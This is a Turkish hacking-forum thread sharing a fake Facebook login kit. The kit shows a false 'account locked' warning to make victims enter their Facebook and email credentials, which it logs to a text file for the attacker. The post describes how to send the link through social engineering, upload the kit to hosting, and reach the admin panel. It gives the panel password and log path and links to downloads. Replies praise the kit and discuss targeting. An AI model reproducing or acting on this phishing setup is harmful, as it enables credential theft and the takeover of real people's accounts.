Facebook Hack,Facebook Script [Sos.M.,Bay,Bayan,Takım]

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

AhmetHan48

Yeni üye
16 Mar 2017
9
0
images

Öncelikle belirteyimki yanlış anlaşılmalar olmasın,
Script bana ait değildir neredeyse tüm dosyalarını tek tek editledim fakat bu bana ait olduğunu göstermez Anasayfadaki script hackcasus ve hacker11548'e aittir,Geriye kalan büyük bir kısımdaki script eflakin'e aittir (geçte olsa) izin alınarak paylaşılmıştır,kendilerine teşekkür ediyorum başarılı bir script olmuş ellerine sağlık...

1.gif

Ne işe yarar ?

1.gif

Aşağıda verdiğim dosyalar ile kurduğunuz sahte facebook görünümlü siteden hesabına giriş yapan kişilerin facebook hesabını rahatlıkla çalabilirsiniz.Bunu nasıl yapıcam diyorsanız Sosyal Mühendislik yolu ile hedef kişiye linki aktarabilirsiniz,facebook ile arasındaki benzerlik çok incelenmeden tıklandığı takdirde kesinlikle farkına varılamaz ve giriş yapıldığı anda iş işten geçmiş olur...

1.gif

YENİLİKLER

1.gif

[+]
Anasayfadaki scripte .html isimleri düzenlendi ve inandırıcı bi hale getirildi.CC.html yerine hesap.guvenligi.html vb...
[+]​
Sayfa altlarında ve üstlerindeki gereksiz boşluklar giderildi.
[+]​
Panel şifrelemesi değiştirildi.
[+]​
Panel şifresi yanlış girildiğinde uyarı ekranına yönlendirir.
[+]​
2 Script birleştirilmiştir ve aynı dosya üzerine kayıt yapmaktadır.
[+]​
2.Script'teki tüm sayfaların adı Buse Demirel olarak gözüküyordu,tek tek düzeltildi.
[+]​
2.Script'teki fb.html - gs.html sayfa isimleri ile değiştirildi ve inandırıcı bir görünüme kavuştu.
[+]​
Sekme isminin başında gördüğünüz küçük facebook iconu tüm sayfalara eklendi.
[+]​
facebook.com harici yönlendirmeler engellendi.
[+]​
Doğrulama ekranındaki işlemler tamamlandıktan sonra facebook giriş ekranına yönlendirme eklendi.

NOT: Ücretsiz yada ücretli hosting satın aldıktan sonra verdiğim dosyaları sitenize yükleyerek resimlerde gördüğünüz .html adreslerini site sonuna ekleyerek ulaşabilirsiniz.Ör/ "siteadı.com/hesap.guvenligi.html".Admin paneline giriş şifresini admin.html dosyasındaki var password'un karşısındaki yeri silerek şifreyi değiştirebilirsiniz.Mevcut şifre ; turkhackteam.mykrallife

Resimlerin boyutları ile oynadığım için kalite bozuldu scriptte sorun yoktur.
Demo Site :

Kod:
[URL="http://link.tl/Vi0C"]Facebook[/URL] 
[COLOR="Purple"](Hostinger Botnet,FakeScript gibi şeyler barındıran siteleri kaldırıyor) 
Demo Sitem 1 ay çalıştıktan sonra banlanmıştır.[/COLOR]

Sitenin ana sayfasında Hesabınız Kilitlendi gibi bir uyarı bulunuyor ve kişi bu tür işler ile çok bilgili değil ise panik yapacaktır ve hemen söylenen işlemleri uygulayacaktır.

MoDLM9.jpg

Sözde kilitlenen hesabını onaylamak için bu ekrana gelicek ve bilgilerini yazıcak dasgagfw falan bişeyler sallar ise site kabul etmez @hotmail.com şarttır.

Qv2Zdg.jpg

Resimde gördüğünüz gibi sallamasyon e-posta adreslerini kabul etmez.

X96LzD.jpg

E-Posta şifresini girdikten sonra iş işten geçmiştir bilgiler /scriptlogthtmykrallife.txt dizinine kayıt olmuştur.

bk6Joj.jpg

Salladığım e posta adresi,şifre ve ip adresim doğru bir şekilde elime ulaştı.

JqDArq.jpg

Admin panelinde şifreleme ekranı bulunmaktadır,şifresi yukarıdaki NOT'ta mevcuttur.

d8BkVn.jpg

Şifre yanlış girildiği takdirde kişi bu ekrana yönlendirilir.

5LyMOd.jpg

Şifreyi doğru yazdığınızda karşınıza böyle bir ileti gelecektir ve Tamam dedikten sonra siteye erişim sağlayabileceğinizi belirtmektedir,şifreyi doğru girseniz bile tekrar soracaktır iptal diyerek şifreleme ekranını kapatın.

Anz5lq.jpg

Ve site içersindeki Fake Profillerin olduğu bölüme ulaşmak için kullanabileceğiniz panel ekranı karşınıza gelecektir.

JqDngn.jpg

Admin Panelinden Görüntü ;

WgDk62.jpg

Fake Facebook Galatasaray Sayfası

0lzm5L.jpg

Fake Facebook Fenerbahçe Sayfası

41zbJq.jpg

Tüm HTML sayfalarını atmaya kalkarsam konu uzadıkça uzayacak fazla uzatmadan linkleri verelim,kolay gelsin...!

1.gif

Admin Paneli : /admin.html
E-Posta Pass Log : /scriptlogthtmykrallife.txt
Admin Paneli Şifre : turkhackteam.mykrallife

1.gif

İndirme Linkleri

1.gif

Dosya CO

Dosya TC

Media Fire

1.gif

Virus Total

1.gif

Virus Total << TIKLA

Kısaltma için Fearlessleon'dan izin alınmıştır.

NOT: "PHP.Trojan" tespit edilmesinin sebebi girilen E-Posta ve Şifre'yi kaydetmesinden kaynaklanır. "VT:5 / 54"

Arkadaşlar DEMO sitedeki sicript'i kullanıyorum fakat hergün [email protected] gibi sallamasyon adresleri siliyorum çalıştığını doğrulamak istiyorsanız kayıt ettiği yeri göremeden böyle bişey mümkün değil.Siteyi deneme amaçlı kullanmazsak sevinirim.Kolay gelsin.

41z47A.jpg

Teşekkür butonu kullanalım :)

▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬
▬▬▬▬▬▬▬▬▬​

Facebook Hakkındaki Diğer Konularım:
Kod:
[URL="http://www.turkhackteam.org/sosyal-medya-veya-sosyal-platformlar/1439791-2017-facebook-hack-facebook-script-sos-m-bay-bayan-takim.html"][COLOR="SeaGreen"]2017 Facebook Hack,Facebook Script [Sos.M.,Bay,Bayan,Takım][/COLOR][/URL]

[URL="http://www.turkhackteam.org/facebook/1441196-2017-facebook-hesap-kapatma-detayli-anlatim.html"][COLOR="SeaGreen"]2017 Facebook Hesap Kapatma - Detaylı Anlatım -[/COLOR][/URL]

[URL="http://www.turkhackteam.org/sosyal-medya-veya-sosyal-platformlar/1444718-2017-facebook-10-saniyede-tum-arkadaslari-gruba-ekleme.html"][COLOR="SeaGreen"]2017 Facebook 10 Saniyede Tüm Arkadaşları Gruba Ekleme[/COLOR][/URL]

[URL="http://www.turkhackteam.org/sosyal-medya-veya-sosyal-platformlar/1446103-2017-facebook-1-saniyede-tum-arkadaslik-isteklerini-onaylama.html"][COLOR="SeaGreen"]2017 Facebook 1 Saniyede Tüm Arkadaşlık İsteklerini Onaylama[/COLOR] [/URL]

Ellerinize sağlık. Gayet yararlı bir konu.

THTCodeR

Üye
22 Eki 2015
162
0
Daha önce bu yorum yapıldı mı bilmiyorum ama sadece @hotmail sıkıntı çıkarmaz mı çünkü @gmail kullanan da var.

Bu arada konu için Teşekkürler. Elinize sağlık.

SeeBekO

Üye
8 Ocak 2017
241
0
Eee çok şey eksik dostum .! Ben bu scripti bir türkü hacklemek için kullanmıcamki sen bana pkklılara avlamam için site ayarla bunlar bana gelmez aga .!

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.